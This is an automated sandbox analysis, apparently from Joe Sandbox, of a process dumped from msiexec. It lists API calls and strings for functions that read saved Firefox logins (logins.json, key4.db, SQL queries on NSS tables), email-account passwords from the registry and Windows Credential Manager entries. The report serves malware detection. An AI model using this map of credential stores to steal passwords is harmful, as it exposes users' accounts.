                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@??3@memcpymemset
                      • String ID: (yE$(yE$(yE
                      • API String ID: 1865533344-362086290
                      • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                      • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                      APIs
                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                      • memset.MSVCRT ref: 0040E5B8
                      • memset.MSVCRT ref: 0040E5CD
                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                      • memset.MSVCRT ref: 0040E6B5
                      • memset.MSVCRT ref: 0040E6CC
                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                      • memset.MSVCRT ref: 0040E736
                      • memset.MSVCRT ref: 0040E74F
                      • sprintf.MSVCRT ref: 0040E76D
                      • sprintf.MSVCRT ref: 0040E788
                      • _strcmpi.MSVCRT ref: 0040E79E
                      • _strcmpi.MSVCRT ref: 0040E7B7
                      • _strcmpi.MSVCRT ref: 0040E7D3
                      • memset.MSVCRT ref: 0040E858
                      • sprintf.MSVCRT ref: 0040E873
                      • _strcmpi.MSVCRT ref: 0040E889
                      • _strcmpi.MSVCRT ref: 0040E8A5
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                      • API String ID: 4171719235-3943159138
                      • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                      • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                      • GetWindowRect.USER32(?,?), ref: 00410487
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                      • GetDC.USER32 ref: 004104E2
                      • strlen.MSVCRT ref: 00410522
                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                      • ReleaseDC.USER32(?,?), ref: 00410580
                      • sprintf.MSVCRT ref: 00410640
                      • SetWindowTextA.USER32(?,?), ref: 00410654
                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                      • GetClientRect.USER32(?,?), ref: 004106DD
                      • GetWindowRect.USER32(?,?), ref: 004106E7
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                      • GetClientRect.USER32(?,?), ref: 00410737
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                      • String ID: %s:$EDIT$STATIC
                      • API String ID: 1703216249-3046471546
                      • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                      • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                      APIs
                      • memset.MSVCRT ref: 004024F5
                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                      • _mbscpy.MSVCRT(?,00000000,?,?,?,68147B60,?,00000000), ref: 00402533
                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _mbscpy$QueryValuememset
                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                      • API String ID: 168965057-606283353
                      • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                      • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                      APIs
                      • memset.MSVCRT ref: 00402869
                        • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                      • _mbscpy.MSVCRT(?,?,68147B60,?,00000000), ref: 004028A3
                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,68147B60,?,00000000), ref: 0040297B
                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                      • API String ID: 1497257669-167382505
                      • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                      • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                      • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                      • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                      APIs
                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                      • LoadCursorA.USER32(00000067), ref: 0040115F
                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                      • EndDialog.USER32(?,00000001), ref: 0040121A
                      • DeleteObject.GDI32(?), ref: 00401226
                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                      • ShowWindow.USER32(00000000), ref: 00401253
                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                      • ShowWindow.USER32(00000000), ref: 00401262
                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                      • memset.MSVCRT ref: 0040128E
                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                      • String ID:
                      • API String ID: 2998058495-0
                      • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                      • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                      APIs
                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcmp$memcpy
                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                      • API String ID: 231171946-2189169393
                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _mbscat$memsetsprintf$_mbscpy
                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                      • API String ID: 633282248-1996832678
                      • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                      • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                      APIs
                      • memset.MSVCRT ref: 00406782
                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                      • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                      • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                      • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                      • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                      • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                      • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                      • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                      • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                      • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                      • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                      • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                      • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                      • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                      • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                      Strings
                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                      • key4.db, xrefs: 00406756
                      • , xrefs: 00406834
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memcmp$memsetstrlen
                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                      • API String ID: 3614188050-3983245814
                      • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                      • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                      • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                      • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: sprintf$memset$_mbscpy
                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                      • API String ID: 3402215030-3842416460
                      • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                      • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                      APIs
                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                      • strlen.MSVCRT ref: 0040F139
                      • strlen.MSVCRT ref: 0040F147
                      • memset.MSVCRT ref: 0040F187
                      • strlen.MSVCRT ref: 0040F196
                      • strlen.MSVCRT ref: 0040F1A4
                      • memset.MSVCRT ref: 0040F1EA
                      • strlen.MSVCRT ref: 0040F1F9
                      • strlen.MSVCRT ref: 0040F207
                      • _strcmpi.MSVCRT ref: 0040F2B2
                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                      • String ID: logins.json$none$signons.sqlite$signons.txt
                      • API String ID: 2003275452-3138536805
                      • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                      • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                      APIs
                      • memset.MSVCRT ref: 0040C3F7
                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                      • strrchr.MSVCRT ref: 0040C417
                      • _mbscat.MSVCRT ref: 0040C431
                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                      • API String ID: 1012775001-1343505058
                      • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                      • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                      APIs
                      • memset.MSVCRT ref: 00444612
                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                      • strlen.MSVCRT ref: 0044462E
                      • memset.MSVCRT ref: 00444668
                      • memset.MSVCRT ref: 0044467C
                      • memset.MSVCRT ref: 00444690
                      • memset.MSVCRT ref: 004446B6
                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpymemset$strlen$_mbscpy
                      • String ID: salu
                      • API String ID: 3691931180-4177317985
                      • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                      • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                      APIs
                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$Library$FreeLoad
                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                      • API String ID: 2449869053-232097475
                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                      APIs
                      • sprintf.MSVCRT ref: 0040957B
                      • LoadMenuA.USER32(?,?), ref: 00409589
                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                      • DestroyMenu.USER32(00000000), ref: 004095A7
                      • sprintf.MSVCRT ref: 004095EB
                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                      • memset.MSVCRT ref: 0040961C
                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                      • DestroyWindow.USER32(00000000), ref: 0040965C
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                      • String ID: caption$dialog_%d$menu_%d
                      • API String ID: 3259144588-3822380221
                      • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                      • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                      APIs
                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
